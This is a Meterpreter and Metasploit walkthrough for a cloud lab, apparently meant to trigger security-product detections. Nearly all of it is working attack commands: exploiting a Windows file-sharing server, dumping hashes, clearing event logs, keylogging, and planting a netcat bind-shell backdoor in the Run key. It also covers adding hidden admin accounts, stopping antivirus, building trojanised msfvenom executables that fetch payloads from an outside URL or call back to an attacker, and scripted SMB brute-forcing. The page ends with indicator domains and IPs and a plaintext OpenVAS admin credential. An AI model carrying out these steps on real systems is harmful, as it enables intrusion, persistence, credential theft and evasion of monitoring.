Example 02: Meterpreter Walkthrough

(0) Cloud Lab

NAT 10.34.34.54

(1) Install Easy File Sharing Webserver 7.2

(https://vmoshpit.com/Malware/efssetup.exe.zip) on Windows and run as Administrator (or not)

(2) Run Exploit

msf > use exploit/windows/http/easyfilesharing_post
msf > set rhosts 192.168.2.215
msf > run

(3) Meterpreter

meterpreter > background (Send the session to the background)
msf > sessions -l (List sessions)
msf > sessions -i 1 (Interact with session 1)

System |

meterpreter > shell
meterpreter > steal_token <pid> (Steal the token of a running process; find PIDs with ps)
meterpreter > upload /Pentest/Malware/Antivirus.exe
meterpreter > execute -f Antivirus.exe
meterpreter > clearev (Clear Event Logs)

Filesystem |

meterpreter > lpwd (Print local working directory)
meterpreter > lls (List local files)
meterpreter > edit <file> (Edit a file)
meterpreter > download <file> (Download a file)
meterpreter > search -f *.docx (Search the target for files)

Credentials |

meterpreter > run post/windows/escalate/getsystem
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/lsa_secrets

Token impersonation |

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token VMOSHPIT\\Administrator (the backslash in DOMAIN\user must be escaped)
meterpreter > getuid
meterpreter > shell

Network |

meterpreter > arp (Display ARP cache)
meterpreter > ifconfig
meterpreter > route
meterpreter > run post/windows/recon/computer_browser_discovery

Gather Info |

meterpreter > run post/windows/gather/checkvm (Is the target a VM?)
meterpreter > sysinfo
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_ad_computers
meterpreter > run post/windows/gather/enum_av_excluded (AV exclusion paths, handy for dropping tools)
meterpreter > run winenum (Legacy script; scrapes everything, run getsystem first)
meterpreter > run post/multi/recon/local_exploit_suggester

Install Netcat Backdoor on Port 666 |

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 666 -e cmd.exe'

meterpreter > execute -f cmd -i

(In the spawned cmd.exe: open the port in the Windows firewall, then start the listener by hand so you do not have to wait for the next logon to trigger the Run key.)

netsh firewall show opmode
netsh firewall add portopening TCP 666 "Service Firewall" ENABLE ALL
netsh firewall show portopening
C:\windows\system32\nc.exe -Ldp 666 -e cmd.exe

(From the attacker, connect to the bind shell; no -l here, the target is the one listening.)

nc -v 192.168.2.11 666

Keylogger |

meterpreter > keyscan_start
meterpreter > keyscan_dump (Dump captured keystrokes; must run while the keylogger is still active)
meterpreter > keyscan_stop
meterpreter > screenshot

Control |

meterpreter > uictl disable keyboard/mouse/all
meterpreter > uictl enable keyboard/mouse/all
meterpreter > run post/windows/manage/enable_rdp

(4) Windows CMD Create user 'Backup' and add to Admin Group |

net user Backup Password00-- /add
net accounts /maxpwage:unlimited (/MaxPWAge is a 'net accounts' switch, not a 'net user' one, and applies to all local accounts)
net localgroup Administratoren Backup /add (German group name; "Administrators" on an English system)
net localgroup Remotedesktopbenutzer Backup /add (German group name; "Remote Desktop Users" on an English system)

Start/Stop Services |

net stop "Windows-Firewall" (German display name; the service short name is MpsSvc. Windows 8/2012 and later refuse to stop it this way; use netsh advfirewall set allprofiles state off instead)
net stop "Trend Micro Deep Security Agent"

Run as different user |

runas /user:vmoshpit\Administrator command

Print current ARP table |

arp -a

Edit ARP table and add entry |

arp -s 157.55.85.212 00-aa-00-62-c6-09

Create NFS share of Drive C and allow anonymous root access |

nfsshare FFA=C:\ -o anon=yes -o rw -o root

Create CIFS share with full access for everyone, then remove it again |

net share FFA=C:\ /grant:Jeder,FULL ("Jeder" is the German name of the "Everyone" group)
net share FFA /delete /y (Removes the share)

Install Telnet Client | dism /online /Enable-Feature /FeatureName:TelnetClient

(5) Linux Shell Add user to sudoers

usermod -aG sudo Veeam (Debian/Ubuntu; on RHEL-family systems the group is wheel)

(6) MSFvenom

(a) Create PE that downloads an executable from a URL and runs it as a new process. Obfuscate it:

msfvenom --payload windows/download_exec URL=http://lxwo.org/venom.exe PrependMigrate=true PrependMigrateProc="Virus.exe" --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/LoJaxStager.exe

(b) Use putty.exe as template to create new PE that opens a Windows warning with text. Obfuscate it:

msfvenom --payload windows/messagebox ICON=WARNING TEXT="Your files have been encrypted." TITLE="Hacked!" PrependMigrate=true --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/Vattenfall02.exe

(c) Use putty.exe as template to create new PE that creates a new local Windows user account. Obfuscate it (windows/adduser takes USER= and PASS=, not positional arguments):

msfvenom --payload windows/adduser USER=Hacker PASS=Hacker1234! --arch x86 --platform windows --format exe --encoder x86/shikata_ga_nai -i 100 -x /Malware/putty.exe --out /void/Malware/Skype.exe

(d) Use vncviewer as template to create new PE that connects Meterpreter via TCP to Attacker

msfvenom --payload windows/meterpreter_reverse_tcp LHOST=192.168.2.222 LPORT=80 --arch x86 --platform windows --format exe --encoder x86/shikata_ga_nai -i 999 --encrypt base64 -k -x /usr/share/windows-binaries/vncviewer.exe --out /void/Malware/Demobackdoor.exe

(vncviewer.exe from Kali's windows-binaries is a 32-bit PE, so payload, --arch and encoder must all be x86: a 64-bit payload cannot be injected into a 32-bit template with -k, and x86/shikata_ga_nai cannot encode x64 code. -k has to come before -x, because -x takes the template path as its argument.)
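The mistake that is easiest to make in (d) is mixing architectures: the template, the payload, --arch and the encoder all have to agree. The following shell script is an added example, not part of the original walkthrough: it reads the Machine field of a PE file's header (e_lfanew at offset 0x3c, then IMAGE_FILE_HEADER.Machine right after the "PE\0\0" signature) and prints an msfvenom command whose payload and encoder match. The x64 encoder choice (x64/xor_dynamic), the iteration count and the fake-PE builder used for the offline demo are my assumptions; it assumes a little-endian host because od reads the fields in native byte order.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): check that a template PE's
# machine type matches the msfvenom payload arch before building with -k -x.
# Assumes a little-endian host (od reads the PE fields in native byte order).

# Print "x86", "x64" or "unknown" for the PE file given as $1.
pe_arch() {
    f=$1
    # DOS header must start with "MZ" (0x4d 0x5a).
    magic=$(od -An -t x1 -N 2 "$f" 2>/dev/null | tr -d ' \n')
    if [ "$magic" != "4d5a" ]; then
        echo unknown
        return 0
    fi
    # e_lfanew: 4-byte little-endian offset of the PE header, stored at 0x3c.
    lfanew=$(od -An -t u4 -j 60 -N 4 "$f" 2>/dev/null | tr -d ' \n')
    [ -n "$lfanew" ] || { echo unknown; return 0; }
    sig=$(od -An -t x1 -j "$lfanew" -N 4 "$f" 2>/dev/null | tr -d ' \n')
    if [ "$sig" != "50450000" ]; then   # "PE\0\0"
        echo unknown
        return 0
    fi
    # IMAGE_FILE_HEADER.Machine is the 2-byte field right after the signature.
    machine=$(od -An -t u2 -j $((lfanew + 4)) -N 2 "$f" 2>/dev/null | tr -d ' \n')
    case $machine in
        332)   echo x86 ;;   # 0x014c IMAGE_FILE_MACHINE_I386
        34404) echo x64 ;;   # 0x8664 IMAGE_FILE_MACHINE_AMD64
        *)     echo unknown ;;
    esac
}

# Print an msfvenom command line whose payload, --arch and --encoder all match
# the template's architecture. Args: template LHOST LPORT output-path.
# Encoder choice for x64 (x64/xor_dynamic) is an assumption of this example.
venom_cmd() {
    tmpl=$1 lhost=$2 lport=$3 out=$4
    case $(pe_arch "$tmpl") in
        x86) payload=windows/meterpreter_reverse_tcp     arch=x86 enc=x86/shikata_ga_nai ;;
        x64) payload=windows/x64/meterpreter_reverse_tcp arch=x64 enc=x64/xor_dynamic ;;
        *)   echo "refusing: $tmpl is not a PE with a known machine type" >&2; return 1 ;;
    esac
    printf 'msfvenom --payload %s LHOST=%s LPORT=%s --arch %s --platform windows --format exe --encoder %s -i 5 -k -x %s --out %s\n' \
        "$payload" "$lhost" "$lport" "$arch" "$enc" "$tmpl" "$out"
}

# Build a minimal fake PE (only the header fields read above) for offline tests:
# "MZ", zeros up to 0x3c, e_lfanew = 0x80, zeros, "PE\0\0", then the machine word.
# $1 = path, $2 = machine word as printf octal escapes, little-endian.
mk_fake_pe() {
    {
        printf 'MZ'
        dd if=/dev/zero bs=1 count=58 2>/dev/null
        printf '\200\000\000\000'
        dd if=/dev/zero bs=1 count=64 2>/dev/null
        printf 'PE\000\000'
        printf "$2"
    } > "$1"
}

# Demo: one constructed x86 and one constructed x64 template, plus Kali's real
# vncviewer.exe if it exists on this machine.
demo_dir=$(mktemp -d)
mk_fake_pe "$demo_dir/x86.exe" '\114\001'   # 0x014c
mk_fake_pe "$demo_dir/x64.exe" '\144\206'   # 0x8664
for t in "$demo_dir/x86.exe" "$demo_dir/x64.exe" /usr/share/windows-binaries/vncviewer.exe; do
    if [ -f "$t" ]; then
        echo "$t: $(pe_arch "$t")"
        venom_cmd "$t" 192.168.2.222 80 /void/Malware/Demobackdoor.exe
    fi
done
rm -rf "$demo_dir"
```

Run it on a Kali box and the last line of output is the command to use for vncviewer.exe; if pe_arch prints "unknown" for a file, it is not a usable -x template at all. The same check applies to the putty.exe used in (a) to (c).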

(7) Metasploit Modules to trigger Deep Security

msf > use auxiliary/scanner/smb/smb_login
msf > set user_as_pass true
msf > set user_file /void/wordlist.txt
msf > set rhosts 192.168.2.215
msf > set smbdomain vmoshpit
msf > run

(8) Metasploit via CLI/Script

SMB Dictionary Attack

msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set user_as_pass true; set user_file /void/Wordlists/Probable-Wordlists/Real-Passwords/Top1575-probable-v2.txt; set rhost 192.168.2.215; set smbdomain vmoshpit; run; exit -y"

SMB Dictionary Attack (with useless 'echo'; the nmap result is not checked, and wget needs -O to write the file the next line uses)

#!/bin/bash
echo "[+] Downloading Wordlist."
echo "[*] Scanning Ports."
nmap -T5 -Pn -p445 --open 192.168.2.215
echo "[!] Found vulnerable SMB share."
echo "[+] Loading Dictionary Attack."
wget -q -O /void/fasttrack.txt http://vmoshpit.com/Malware/Wordlists/fasttrack.txt
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set user_as_pass true; set user_file /void/fasttrack.txt; set rhost 192.168.2.215; set smbdomain vmoshpit; run; exit -y"
rm /void/fasttrack.txt
echo "[+] Successfully compromised Host."
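The script above announces a vulnerable share whatever nmap found. As an added example, not from the original page, here is the same attack gated on the actual scan result and driven by a Metasploit resource script (msfconsole -r) instead of a long quoted -x string. Target, domain and wordlist URL are the lab values from the page; RC_DIR, the STOP_ON_SUCCESS/THREADS settings and the constructed nmap -oG lines used for the offline demo are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): SMB dictionary attack that
# only runs when nmap really reports 445/tcp open, using a resource script.
RC_DIR=${RC_DIR:-/tmp}   # assumption: where wordlist and .rc are written

# Read nmap grepable output (-oG -) on stdin; succeed only if the given port
# is reported "open" on some host. Ports: fields look like "445/open/tcp//..."
# and are preceded by a space or ", ", so "1445/open" cannot match 445.
port_open_in_grepable() {
    port=$1
    grep -q "[[:space:],]$port/open/"
}

# Download the wordlist; fail on a download error or an empty file.
fetch_wordlist() {
    url=$1 dest=$2
    wget -q -O "$dest" "$url" && [ -s "$dest" ]
}

# Write a resource script for auxiliary/scanner/smb/smb_login.
# Args: rhosts domain wordlist-path rc-path. Fails if the wordlist is missing or empty.
write_smb_login_rc() {
    rhosts=$1 domain=$2 wordlist=$3 rc=$4
    [ -s "$wordlist" ] || { echo "wordlist missing or empty: $wordlist" >&2; return 1; }
    cat > "$rc" <<EOF
use auxiliary/scanner/smb/smb_login
set RHOSTS $rhosts
set SMBDomain $domain
set USER_FILE $wordlist
set USER_AS_PASS true
set STOP_ON_SUCCESS true
set THREADS 4
run
exit -y
EOF
}

# Live run: scan first, brute-force only if 445 is open, clean up afterwards.
smb_attack() {
    target=$1 domain=$2 url=$3
    wl=$RC_DIR/fasttrack.txt rc=$RC_DIR/smb_login.rc
    if ! nmap -T5 -Pn -p445 --open -oG - "$target" | port_open_in_grepable 445; then
        echo "[-] $target: 445/tcp not open, nothing to attack" >&2
        return 1
    fi
    fetch_wordlist "$url" "$wl" || { echo "[-] wordlist download failed" >&2; return 1; }
    write_smb_login_rc "$target" "$domain" "$wl" "$rc" || return 1
    msfconsole -q -r "$rc"
    rm -f "$wl" "$rc"
}

# Offline demo on constructed nmap -oG lines (no scan, no msfconsole started).
open_line=$(printf 'Host: 192.168.2.215 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///')
closed_line=$(printf 'Host: 192.168.2.216 ()\tPorts: 445/filtered/tcp//microsoft-ds///')
printf '%s\n' "$open_line"   | port_open_in_grepable 445 && echo "192.168.2.215: 445 open, would attack"
printf '%s\n' "$closed_line" | port_open_in_grepable 445 || echo "192.168.2.216: 445 not open, skipped"
demo_wl=$(mktemp)
printf 'administrator\nbackup\nveeam\n' > "$demo_wl"   # constructed three-entry wordlist
write_smb_login_rc 192.168.2.215 vmoshpit "$demo_wl" "$RC_DIR/demo_smb_login.rc" && cat "$RC_DIR/demo_smb_login.rc"
rm -f "$demo_wl" "$RC_DIR/demo_smb_login.rc"
# Live use in the lab: smb_attack 192.168.2.215 vmoshpit http://vmoshpit.com/Malware/Wordlists/fasttrack.txt
```

The resource script form also makes the detection test repeatable: the same .rc can be replayed against the Deep Security sensor after a rule change without retyping the -x string.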

Apex VP Trigger:

1009549 - Detected Terminal Services (RDP) Server Traffic - 1 (ATT&CK T1015,T1043,T1076)

msfconsole -q -x "use scanner/rdp/cve_2019_0708_bluekeep; set rhost 192.168.2.130; run; exit -y"

Apex VP Trigger:

1008227 - Microsoft Windows SMB Information Disclosure Vulnerability (CVE-2017-0147)

1005448 - SMB Null Session Detected - 1

msfconsole -q -x "use auxiliary/scanner/smb/smb_ms17_010; set rhost 192.168.2.130; run; exit -y"

Exploit Easy File Sharing App

msfconsole -q -x "use exploit/windows/http/easyfilesharing_seh; set rhosts 192.168.2.215; run"

Windows PEs on Kali: /usr/share/windows-binaries/

Payloads to trigger ATSE
----------------------------------------

Domains:
secao.org
ikmtrust.com
sysanalyticweb.com
lxwo.org
jflynci.com
remotepx.net
rdsnets.com
rpcnetconnect.com
webstp.com
elaxo.org

IP addresses:
185.77.129.106
185.144.82.239
93.113.131.103
185.86.149.54
185.86.151.104
103.41.177.43
185.86.148.184
185.94.191.65
86.106.131.54

Known bad file hashes (SHA-1)

1771e435ba25f9cdfa77168899490d87681f2029

OpenVAS in Cloud Lab https://192.168.2.222:9392 admin:bbbe3b76-1c5d-484e-a75c-c48ef07f92d3